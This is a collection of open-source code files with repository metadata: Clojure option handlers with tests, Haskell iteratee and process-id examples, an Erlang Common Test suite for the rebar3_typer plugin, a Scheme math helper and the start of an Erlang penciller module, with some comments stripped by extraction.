(let [{args :proc/val} arg]
(assert-arg! vector? arg)
(fn [[k f]]
[k (if (fn? f)
(apply f args)
(data-error f k "value must be a function"))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a 4 ]
)
# # # : batch option
only for function value .
(defmethod apply-post :batch
[arg]
(assert-arg! #(and (vector? %) (every? vector? %)) arg)
(let [{args-vec :proc/val} arg]
(fn [[k f]]
[k (if-not (fn? f)
(data-error f k "value must be a function")
(map #(apply f %) args-vec))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a [ 4 5 ] ]
)
# # # : seq option ( Pagination )
from : number ] [: count : number ] ]
Appliable only for seq query .
(defmethod apply-post :seq
[arg]
(assert-arg! vector? arg)
(let [[from cnt] (:proc/val arg)
from (or from 0)
cnt (or cnt 0)]
(fn [[k v]]
[k (if-not (seqable? v)
(data-error v k "seq option can only be used on sequences")
(->> v (drop from) (take cnt)))])))
^:rct/test
(comment
)
# # # : watch option
(def watchable?
"pred if `x` is watchable"
(fn [x]
#?(:clj (instance? clojure.lang.IRef x)
:cljs (satisfies? IDeref x))))
(defmethod apply-post :watch
[arg]
(assert-arg! fn? arg)
(let [f (:proc/val arg)
w-k ::watch
watcher (fn [_ watched old-value new-value]
(when (nil? (f old-value new-value))
(remove-watch watched w-k)))]
(fn [[k v]]
(if (watchable? v)
(do (add-watch v w-k watcher)
[k @v])
[k (data-error v k "watch option can only apply to an watchable value")]))))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
(def a (atom 0))
(def b (atom 0))
(reset! a 5)
= > 5
) |
33f011881564945a56b833fdfc68b06bade56429a2574f08d79703b161a3b837 | JohnLato/iteratee | test_wc.hs | import qualified Data.ByteString.Char8 as C
import qualified Data.Iteratee as I
import System
cnt :: I.Iteratee C.ByteString IO Int
cnt = I.liftI (step 0)
where
step acc (I.Chunk s)
| C.null s = I.icont (step acc) Nothing
| True = let acc' = acc + C.count '\n' s in acc' `seq` I.icont (step acc') Nothing
step acc str = I.idone acc str
main = do
[f] <- getArgs
I.fileDriverVBuf (2^16) cnt f >>= print
| null | https://raw.githubusercontent.com/JohnLato/iteratee/83852cebab1051999d70d2abce86f5ab88c6d7ec/Examples/test_wc.hs | haskell | import qualified Data.ByteString.Char8 as C
import qualified Data.Iteratee as I
import System
cnt :: I.Iteratee C.ByteString IO Int
cnt = I.liftI (step 0)
where
step acc (I.Chunk s)
| C.null s = I.icont (step acc) Nothing
| True = let acc' = acc + C.count '\n' s in acc' `seq` I.icont (step acc') Nothing
step acc str = I.idone acc str
main = do
[f] <- getArgs
I.fileDriverVBuf (2^16) cnt f >>= print
| |
4cf3978162d2872173576ba592a0b6c0da34b7ca0d8841922f9fb0d54bbde96b | AdRoll/rebar3_typer | rebar3_typer_prv_SUITE.erl | %%% @doc Test module for rebar3_typer_prv
-module(rebar3_typer_prv_SUITE).
-behaviour(ct_suite).
-export([all/0, init_per_testcase/2, end_per_testcase/2]).
-export([no_options/1, recursive/1, includes/1, files/1, good_modes/1, colliding_modes/1,
show_success_typings/1, no_spec/1, edoc/1, plt/1, typespec_files/1, unrecognized_opt/1,
format_error/1]).
all() ->
[no_options,
recursive,
includes,
files,
good_modes,
colliding_modes,
show_success_typings,
no_spec,
edoc,
plt,
typespec_files,
unrecognized_opt,
format_error].
init_per_testcase(_, Config) ->
Self = self(),
meck:new(typer_core),
meck:expect(typer_core,
run,
fun(Opts) ->
Self ! #{opts => Opts},
ok
end),
Config.
end_per_testcase(_, Config) ->
meck:unload(typer_core),
Config.
%% @doc Just try to run typer without options
no_options(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("Simply running typer without any parameter should use only default values"),
RebarIo =
#{abort => fun rebar_api:abort/2,
debug => fun rebar_api:debug/2,
info => fun rebar_api:info/2,
warn => fun rebar_api:warn/2},
[{files_r, []}, {io, RebarIo}, {mode, show}, {plt, _}] = get_opts(State),
{comment, ""}.
%% @doc --recursive / recursive
recursive(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files_r is correctly picked up from rebar.config"),
Files = ["src/", "test/"],
State1 = rebar_state:set(State, typer, [{recursive, Files}]),
{files_r, Files} = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--recursive takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{recursive, "lib/,src/"}], []}),
{files_r, ["lib/", "src/"]} = lists:keyfind(files_r, 1, get_opts(State2)),
ct:comment("finds dirs from sub_dirs in rebar.config"),
State3 = rebar_state:set(State, sub_dirs, ["foo"]),
{files_r, ["foo"]} = lists:keyfind(files_r, 1, get_opts(State3)),
ct:comment("finds dirs from extra_src_dirs in rebar.config"),
State4 = rebar_state:set(State, extra_src_dirs, ["bar"]),
{files_r, ["bar"]} = lists:keyfind(files_r, 1, get_opts(State4)),
ct:comment("finds dirs from src_dirs in rebar.config"),
State5 = rebar_state:set(State, src_dirs, ["baz"]),
{files_r, ["baz"]} = lists:keyfind(files_r, 1, get_opts(State5)),
ct:comment("assumes reasonable defaults for regular apps"),
{files_r, ["src"]} = lists:keyfind(files_r, 1, get_opts_from("dummy")),
ct:comment("assumes reasonable defaults for umbrella apps"),
{files_r, ["apps/app1/src", "apps/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("umbrella")),
ct:comment("assumes reasonable defaults as a last ditch"),
{files_r, ["lib/app1/src", "lib/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("last-ditch")),
{comment, ""}.
%% @doc Proper include folder discovery
@todo Add tests for includes in rebar
includes(_Config) ->
ct:comment("Regular include folder and erl_opts are correctly picked up"),
{includes, Paths} = lists:keyfind(includes, 1, get_opts_from("dummy")),
["ymmud/selif/" ++ _,
"edulcni/ymmud/selif/" ++ _,
"edulcni_rehto/ymmud/selif/" ++ _,
"crs/ymmud/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(Paths)],
ct:comment("Includes in subdirs are correctly picked up"),
{includes, SubPaths} = lists:keyfind(includes, 1, get_opts_from("subs")),
["sbus/selif/" ++ _,
"edulcni/sbus/selif/" ++ _,
"crs/sbus/selif/" ++ _,
"edulcni/crs/sbus/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(SubPaths)],
ct:comment("Includes in umbrella projects are correctly picked up"),
{includes, UmbPaths} = lists:keyfind(includes, 1, get_opts_from("umbrella")),
["1ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/1ppa/sppa/allerbmu/selif/" ++ _,
"crs/1ppa/sppa/allerbmu/selif/" ++ _,
"2ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/2ppa/sppa/allerbmu/selif/" ++ _,
"crs/2ppa/sppa/allerbmu/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(UmbPaths)],
{comment, ""}.
%% @doc --files / files
files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files is correctly picked up from rebar.config"),
Files = ["files/dummy/src/dummy.erl"],
State1 = rebar_state:set(State, typer, [{files, Files}]),
{files, Files} = lists:keyfind(files, 1, get_opts(State1)),
ct:comment("files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--files takes precedence over rebar.config"),
State2 =
rebar_state:command_parsed_args(State1, {[{files, "files/single_file/single.erl"}], []}),
{files, ["files/single_file/single.erl"]} = lists:keyfind(files, 1, get_opts(State2)),
ct:comment("--files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State2)),
{comment, ""}.
%% @doc --show|show_exported|annotate|annotate_inc_files / mode
good_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("mode is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{mode, annotate}]),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State1)),
State2 = rebar_state:set(State1, typer, [{mode, show_exported}]),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State2)),
ct:comment("--show takes precedence"),
State3 = rebar_state:command_parsed_args(State2, {[{show, true}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State3)),
ct:comment("--show=false uses what's in rebar.config"),
State4 = rebar_state:command_parsed_args(State2, {[{show, false}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State4)),
ct:comment("--annotate works"),
State5 = rebar_state:command_parsed_args(State2, {[{annotate, true}], []}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State5)),
ct:comment("--show_exported works"),
State6 = rebar_state:command_parsed_args(State2, {[{show_exported, true}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State6)),
ct:comment("--annotate-inc-files works"),
State7 = rebar_state:command_parsed_args(State2, {[{annotate_inc_files, true}], []}),
{mode, annotate_inc_files} = lists:keyfind(mode, 1, get_opts(State7)),
ct:comment("--annotate-in-place works"),
State8 = rebar_state:command_parsed_args(State2, {[{annotate_in_place, true}], []}),
{mode, annotate_in_place} = lists:keyfind(mode, 1, get_opts(State8)),
ct:comment("on and off works"),
State9 =
rebar_state:command_parsed_args(State, %% without changes in rebar.config
{[{show_exported, true}, {show_exported, false}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State9)),
ct:comment("many false ones"),
State10 =
rebar_state:command_parsed_args(State2,
{[{annotate, true},
{annotate_inc_files, false},
{show, false}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State10)),
ct:comment("super true"),
StateA =
rebar_state:command_parsed_args(State2,
{[{annotate, true}, {annotate, true}, {annotate, true}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(StateA)),
{comment, ""}.
%% @doc --show|show_exported|annotate|annotate_inc_files / mode
colliding_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("2 modes can't be set simultaneously"),
State1 =
rebar_state:command_parsed_args(State, {[{show, true}, {show_exported, true}], []}),
{colliding_modes, show_exported, show} = get_error(State1),
ct:comment("3 modes can't be set simultaneously"),
State2 =
rebar_state:command_parsed_args(State1,
{[{show_exported, true},
{annotate, true},
{annotate_inc_files, true}],
[]}),
{colliding_modes, annotate, show_exported} = get_error(State2),
{comment, ""}.
%% @doc --show_success_typings / show_success_typings
show_success_typings(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("show_succ is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{show_success_typings, true}]),
{show_succ, true} = lists:keyfind(show_succ, 1, get_opts(State1)),
ct:comment("--show_success_typings takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{show_success_typings, false}], []}),
{show_succ, false} = lists:keyfind(show_succ, 1, get_opts(State2)),
{comment, ""}.
%% @doc --no_spec / no_spec
no_spec(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("no_spec is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{no_spec, true}]),
{no_spec, true} = lists:keyfind(no_spec, 1, get_opts(State1)),
ct:comment("--no_spec takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{no_spec, false}], []}),
{no_spec, false} = lists:keyfind(no_spec, 1, get_opts(State2)),
{comment, ""}.
%% @doc --edoc / edoc
edoc(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("edoc is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{edoc, true}]),
{edoc, true} = lists:keyfind(edoc, 1, get_opts(State1)),
ct:comment("--edoc takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{edoc, false}], []}),
{edoc, false} = lists:keyfind(edoc, 1, get_opts(State2)),
{comment, ""}.
@doc --plt / plt
plt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("default plt is used if unconfigured"),
Expected = "_build/default/rebar3_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected} = lists:keyfind(plt, 1, get_opts(State)),
ct:comment("plt is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{plt, "1.plt"}]),
{plt, "1.plt"} = lists:keyfind(plt, 1, get_opts(State1)),
ct:comment("--plt takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{plt, "2.plt"}], []}),
{plt, "2.plt"} = lists:keyfind(plt, 1, get_opts(State2)),
ct:comment("plt from Dialyzer config is used"),
State3 =
rebar_state:set(State, dialyzer, [{plt_location, "dialyzer"}, {plt_prefix, "app"}]),
Expected3 = "dialyzer/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected3} = lists:keyfind(plt, 1, get_opts(State3)),
ct:comment("plt from Dialyzer config is used with local keyword"),
State4 = rebar_state:set(State, dialyzer, [{plt_location, local}, {plt_prefix, "app"}]),
Expected4 = "_build/default/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected4} = lists:keyfind(plt, 1, get_opts(State4)),
{comment, ""}.
%% @doc --typespec_files / typespec_files
typespec_files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("trusted is correctly picked up from rebar.config"),
Files = ["f1.erl", "f2.erl"],
State1 = rebar_state:set(State, typer, [{typespec_files, Files}]),
{trusted, Files} = lists:keyfind(trusted, 1, get_opts(State1)),
ct:comment("--typespec_files takes precedence"),
State2 =
rebar_state:command_parsed_args(State1, {[{typespec_files, "f3.erl,f4.erl"}], []}),
{trusted, ["f3.erl", "f4.erl"]} = lists:keyfind(trusted, 1, get_opts(State2)),
{comment, ""}.
%% @doc unrecognized options
unrecognized_opt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("bad_opt in rebar.config"),
State1 = rebar_state:set(State, typer, [{bad_opt, true}]),
{unrecognized_opt, {bad_opt, true}} = get_error(State1),
{comment, ""}.
%% @doc Error formatting
format_error(_Config) ->
<<"Not yet implemented.">> =
iolist_to_binary(rebar3_typer_prv:format_error(not_implemented)),
<<"Unrecognized option in rebar.config: x">> =
iolist_to_binary(rebar3_typer_prv:format_error({unrecognized_opt, x})),
<<"Mode was previously set to 'm1'; cannot set it to 'm2' now">> =
iolist_to_binary(rebar3_typer_prv:format_error({colliding_modes, m2, m1})),
<<"other">> = iolist_to_binary(rebar3_typer_prv:format_error(other)),
{comment, ""}.
get_opts(State) ->
{ok, _} = rebar3_typer_prv:do(State),
receive
#{opts := Opts} ->
lists:sort(
maps:to_list(Opts))
after 500 ->
{error, timeout}
end.
get_error(State) ->
try rebar3_typer_prv:do(State) of
{error, {rebar3_typer_prv, Error}} ->
Error;
Unexpected ->
ct:fail("Unexpected: ~p", [Unexpected])
catch
error:Error ->
Error
end.
get_opts_from(Folder) ->
{ok, Cwd} = file:get_cwd(),
try
ok =
file:set_cwd(
filename:join([code:lib_dir(rebar3_typer), "test", "files", Folder])),
{ok, RebarConfig} = file:consult("rebar.config"),
{ok, State0} =
rebar_prv_app_discovery:init(
rebar_state:new(RebarConfig)),
{ok, State1} = rebar_prv_app_discovery:do(State0),
{ok, State2} = rebar3_typer:init(State1),
get_opts(State2)
after
file:set_cwd(Cwd)
end.
| null | https://raw.githubusercontent.com/AdRoll/rebar3_typer/a77f3311e3bc0c94836226c343ecbe215180f896/test/rebar3_typer_prv_SUITE.erl | erlang | @doc Test module for rebar3_typer_prv
@doc Just try to run typer without options
@doc --recursive / recursive
@doc Proper include folder discovery
@doc --files / files
@doc --show|show_exported|annotate|annotate_inc_files / mode
without changes in rebar.config
@doc --show|show_exported|annotate|annotate_inc_files / mode
@doc --show_success_typings / show_success_typings
@doc --no_spec / no_spec
@doc --edoc / edoc
@doc --typespec_files / typespec_files
@doc unrecognized options
@doc Error formatting | -module(rebar3_typer_prv_SUITE).
-behaviour(ct_suite).
-export([all/0, init_per_testcase/2, end_per_testcase/2]).
-export([no_options/1, recursive/1, includes/1, files/1, good_modes/1, colliding_modes/1,
show_success_typings/1, no_spec/1, edoc/1, plt/1, typespec_files/1, unrecognized_opt/1,
format_error/1]).
all() ->
[no_options,
recursive,
includes,
files,
good_modes,
colliding_modes,
show_success_typings,
no_spec,
edoc,
plt,
typespec_files,
unrecognized_opt,
format_error].
init_per_testcase(_, Config) ->
Self = self(),
meck:new(typer_core),
meck:expect(typer_core,
run,
fun(Opts) ->
Self ! #{opts => Opts},
ok
end),
Config.
end_per_testcase(_, Config) ->
meck:unload(typer_core),
Config.
no_options(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("Simply running typer without any parameter should use only default values"),
RebarIo =
#{abort => fun rebar_api:abort/2,
debug => fun rebar_api:debug/2,
info => fun rebar_api:info/2,
warn => fun rebar_api:warn/2},
[{files_r, []}, {io, RebarIo}, {mode, show}, {plt, _}] = get_opts(State),
{comment, ""}.
recursive(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files_r is correctly picked up from rebar.config"),
Files = ["src/", "test/"],
State1 = rebar_state:set(State, typer, [{recursive, Files}]),
{files_r, Files} = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--recursive takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{recursive, "lib/,src/"}], []}),
{files_r, ["lib/", "src/"]} = lists:keyfind(files_r, 1, get_opts(State2)),
ct:comment("finds dirs from sub_dirs in rebar.config"),
State3 = rebar_state:set(State, sub_dirs, ["foo"]),
{files_r, ["foo"]} = lists:keyfind(files_r, 1, get_opts(State3)),
ct:comment("finds dirs from extra_src_dirs in rebar.config"),
State4 = rebar_state:set(State, extra_src_dirs, ["bar"]),
{files_r, ["bar"]} = lists:keyfind(files_r, 1, get_opts(State4)),
ct:comment("finds dirs from src_dirs in rebar.config"),
State5 = rebar_state:set(State, src_dirs, ["baz"]),
{files_r, ["baz"]} = lists:keyfind(files_r, 1, get_opts(State5)),
ct:comment("assumes reasonable defaults for regular apps"),
{files_r, ["src"]} = lists:keyfind(files_r, 1, get_opts_from("dummy")),
ct:comment("assumes reasonable defaults for umbrella apps"),
{files_r, ["apps/app1/src", "apps/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("umbrella")),
ct:comment("assumes reasonable defaults as a last ditch"),
{files_r, ["lib/app1/src", "lib/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("last-ditch")),
{comment, ""}.
@todo Add tests for includes in rebar
includes(_Config) ->
ct:comment("Regular include folder and erl_opts are correctly picked up"),
{includes, Paths} = lists:keyfind(includes, 1, get_opts_from("dummy")),
["ymmud/selif/" ++ _,
"edulcni/ymmud/selif/" ++ _,
"edulcni_rehto/ymmud/selif/" ++ _,
"crs/ymmud/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(Paths)],
ct:comment("Includes in subdirs are correctly picked up"),
{includes, SubPaths} = lists:keyfind(includes, 1, get_opts_from("subs")),
["sbus/selif/" ++ _,
"edulcni/sbus/selif/" ++ _,
"crs/sbus/selif/" ++ _,
"edulcni/crs/sbus/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(SubPaths)],
ct:comment("Includes in umbrella projects are correctly picked up"),
{includes, UmbPaths} = lists:keyfind(includes, 1, get_opts_from("umbrella")),
["1ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/1ppa/sppa/allerbmu/selif/" ++ _,
"crs/1ppa/sppa/allerbmu/selif/" ++ _,
"2ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/2ppa/sppa/allerbmu/selif/" ++ _,
"crs/2ppa/sppa/allerbmu/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(UmbPaths)],
{comment, ""}.
files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files is correctly picked up from rebar.config"),
Files = ["files/dummy/src/dummy.erl"],
State1 = rebar_state:set(State, typer, [{files, Files}]),
{files, Files} = lists:keyfind(files, 1, get_opts(State1)),
ct:comment("files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--files takes precedence over rebar.config"),
State2 =
rebar_state:command_parsed_args(State1, {[{files, "files/single_file/single.erl"}], []}),
{files, ["files/single_file/single.erl"]} = lists:keyfind(files, 1, get_opts(State2)),
ct:comment("--files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State2)),
{comment, ""}.
good_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("mode is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{mode, annotate}]),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State1)),
State2 = rebar_state:set(State1, typer, [{mode, show_exported}]),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State2)),
ct:comment("--show takes precedence"),
State3 = rebar_state:command_parsed_args(State2, {[{show, true}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State3)),
ct:comment("--show=false uses what's in rebar.config"),
State4 = rebar_state:command_parsed_args(State2, {[{show, false}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State4)),
ct:comment("--annotate works"),
State5 = rebar_state:command_parsed_args(State2, {[{annotate, true}], []}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State5)),
ct:comment("--show_exported works"),
State6 = rebar_state:command_parsed_args(State2, {[{show_exported, true}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State6)),
ct:comment("--annotate-inc-files works"),
State7 = rebar_state:command_parsed_args(State2, {[{annotate_inc_files, true}], []}),
{mode, annotate_inc_files} = lists:keyfind(mode, 1, get_opts(State7)),
ct:comment("--annotate-in-place works"),
State8 = rebar_state:command_parsed_args(State2, {[{annotate_in_place, true}], []}),
{mode, annotate_in_place} = lists:keyfind(mode, 1, get_opts(State8)),
ct:comment("on and off works"),
State9 =
{[{show_exported, true}, {show_exported, false}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State9)),
ct:comment("many false ones"),
State10 =
rebar_state:command_parsed_args(State2,
{[{annotate, true},
{annotate_inc_files, false},
{show, false}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State10)),
ct:comment("super true"),
StateA =
rebar_state:command_parsed_args(State2,
{[{annotate, true}, {annotate, true}, {annotate, true}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(StateA)),
{comment, ""}.
colliding_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("2 modes can't be set simultaneously"),
State1 =
rebar_state:command_parsed_args(State, {[{show, true}, {show_exported, true}], []}),
{colliding_modes, show_exported, show} = get_error(State1),
ct:comment("3 modes can't be set simultaneously"),
State2 =
rebar_state:command_parsed_args(State1,
{[{show_exported, true},
{annotate, true},
{annotate_inc_files, true}],
[]}),
{colliding_modes, annotate, show_exported} = get_error(State2),
{comment, ""}.
show_success_typings(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("show_succ is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{show_success_typings, true}]),
{show_succ, true} = lists:keyfind(show_succ, 1, get_opts(State1)),
ct:comment("--show_success_typings takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{show_success_typings, false}], []}),
{show_succ, false} = lists:keyfind(show_succ, 1, get_opts(State2)),
{comment, ""}.
no_spec(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("no_spec is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{no_spec, true}]),
{no_spec, true} = lists:keyfind(no_spec, 1, get_opts(State1)),
ct:comment("--no_spec takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{no_spec, false}], []}),
{no_spec, false} = lists:keyfind(no_spec, 1, get_opts(State2)),
{comment, ""}.
edoc(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("edoc is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{edoc, true}]),
{edoc, true} = lists:keyfind(edoc, 1, get_opts(State1)),
ct:comment("--edoc takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{edoc, false}], []}),
{edoc, false} = lists:keyfind(edoc, 1, get_opts(State2)),
{comment, ""}.
@doc --plt / plt
plt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("default plt is used if unconfigured"),
Expected = "_build/default/rebar3_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected} = lists:keyfind(plt, 1, get_opts(State)),
ct:comment("plt is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{plt, "1.plt"}]),
{plt, "1.plt"} = lists:keyfind(plt, 1, get_opts(State1)),
ct:comment("--plt takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{plt, "2.plt"}], []}),
{plt, "2.plt"} = lists:keyfind(plt, 1, get_opts(State2)),
ct:comment("plt from Dialyzer config is used"),
State3 =
rebar_state:set(State, dialyzer, [{plt_location, "dialyzer"}, {plt_prefix, "app"}]),
Expected3 = "dialyzer/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected3} = lists:keyfind(plt, 1, get_opts(State3)),
ct:comment("plt from Dialyzer config is used with local keyword"),
State4 = rebar_state:set(State, dialyzer, [{plt_location, local}, {plt_prefix, "app"}]),
Expected4 = "_build/default/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected4} = lists:keyfind(plt, 1, get_opts(State4)),
{comment, ""}.
typespec_files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("trusted is correctly picked up from rebar.config"),
Files = ["f1.erl", "f2.erl"],
State1 = rebar_state:set(State, typer, [{typespec_files, Files}]),
{trusted, Files} = lists:keyfind(trusted, 1, get_opts(State1)),
ct:comment("--typespec_files takes precedence"),
State2 =
rebar_state:command_parsed_args(State1, {[{typespec_files, "f3.erl,f4.erl"}], []}),
{trusted, ["f3.erl", "f4.erl"]} = lists:keyfind(trusted, 1, get_opts(State2)),
{comment, ""}.
unrecognized_opt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("bad_opt in rebar.config"),
State1 = rebar_state:set(State, typer, [{bad_opt, true}]),
{unrecognized_opt, {bad_opt, true}} = get_error(State1),
{comment, ""}.
format_error(_Config) ->
<<"Not yet implemented.">> =
iolist_to_binary(rebar3_typer_prv:format_error(not_implemented)),
<<"Unrecognized option in rebar.config: x">> =
iolist_to_binary(rebar3_typer_prv:format_error({unrecognized_opt, x})),
<<"Mode was previously set to 'm1'; cannot set it to 'm2' now">> =
iolist_to_binary(rebar3_typer_prv:format_error({colliding_modes, m2, m1})),
<<"other">> = iolist_to_binary(rebar3_typer_prv:format_error(other)),
{comment, ""}.
get_opts(State) ->
{ok, _} = rebar3_typer_prv:do(State),
receive
#{opts := Opts} ->
lists:sort(
maps:to_list(Opts))
after 500 ->
{error, timeout}
end.
get_error(State) ->
try rebar3_typer_prv:do(State) of
{error, {rebar3_typer_prv, Error}} ->
Error;
Unexpected ->
ct:fail("Unexpected: ~p", [Unexpected])
catch
error:Error ->
Error
end.
get_opts_from(Folder) ->
{ok, Cwd} = file:get_cwd(),
try
ok =
file:set_cwd(
filename:join([code:lib_dir(rebar3_typer), "test", "files", Folder])),
{ok, RebarConfig} = file:consult("rebar.config"),
{ok, State0} =
rebar_prv_app_discovery:init(
rebar_state:new(RebarConfig)),
{ok, State1} = rebar_prv_app_discovery:do(State0),
{ok, State2} = rebar3_typer:init(State1),
get_opts(State2)
after
file:set_cwd(Cwd)
end.
|
21238db9366ea539f3e70a2709ad7f0c2ebee6bdb72e8d75cc175c510d5c269c | pflanze/chj-schemelib | utils.scm | Copyright 2013 - 2017 by < >
;;; This file is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License ( GPL ) as published
by the Free Software Foundation , either version 2 of the License , or
;;; (at your option) any later version.
(require easy
constants)
(define-inline (square@ x)
(declare (flonum) (not safe))
(fl* x x))
(define-inline (freqmod@ x)
0 .. 1 - > 0 .. 1
(declare (flonum) (not safe))
(let* ((min (CONST (log 0.1)))
(max (CONST (log 1.1)))
(x* (log (+ x 0.1))))
(/ (- x* min) (- max min))))
(CONSTANTS)
| null | https://raw.githubusercontent.com/pflanze/chj-schemelib/59ff8476e39f207c2f1d807cfc9670581c8cedd3/math/image/effects/utils.scm | scheme | This file is free software; you can redistribute it and/or modify
(at your option) any later version. | Copyright 2013 - 2017 by < >
it under the terms of the GNU General Public License ( GPL ) as published
by the Free Software Foundation , either version 2 of the License , or
(require easy
constants)
(define-inline (square@ x)
(declare (flonum) (not safe))
(fl* x x))
(define-inline (freqmod@ x)
0 .. 1 - > 0 .. 1
(declare (flonum) (not safe))
(let* ((min (CONST (log 0.1)))
(max (CONST (log 1.1)))
(x* (log (+ x 0.1))))
(/ (- x* min) (- max min))))
(CONSTANTS)
|
37be31c6ae778aef42f0edb1ccbfdbfc589e21894f51b132993cc8d9b62546d4 | csgordon/cayenne | GetPid.hs | module Libs.GetPid(getPid) where
import System.Posix
getPid :: IO Int
getPid =
do
p <- getProcessID
return (read (show p))
| null | https://raw.githubusercontent.com/csgordon/cayenne/7fdf59b5e21124b5caa9f776199a30cd0e5d88b2/Libs/GetPid.hs | haskell | module Libs.GetPid(getPid) where
import System.Posix
getPid :: IO Int
getPid =
do
p <- getProcessID
return (read (show p))
| |
ebc1fa391d18d3e284977ed15fa6199003dc4067578bca39b0d13185a7efc210 | martinsumner/leveled | leveled_penciller.erl | %% -------- PENCILLER ---------
%%
%% The penciller is responsible for writing and re-writing the ledger - a
%% persisted, ordered view of non-recent Keys and Metadata which have been
%% added to the store.
%% - The penciller maintains a manifest of all the files within the current
%% Ledger.
- The Penciller provides re - write ( compaction ) work up to be managed by
the Penciller 's Clerk
- The Penciller can be cloned and maintains a register of clones who have
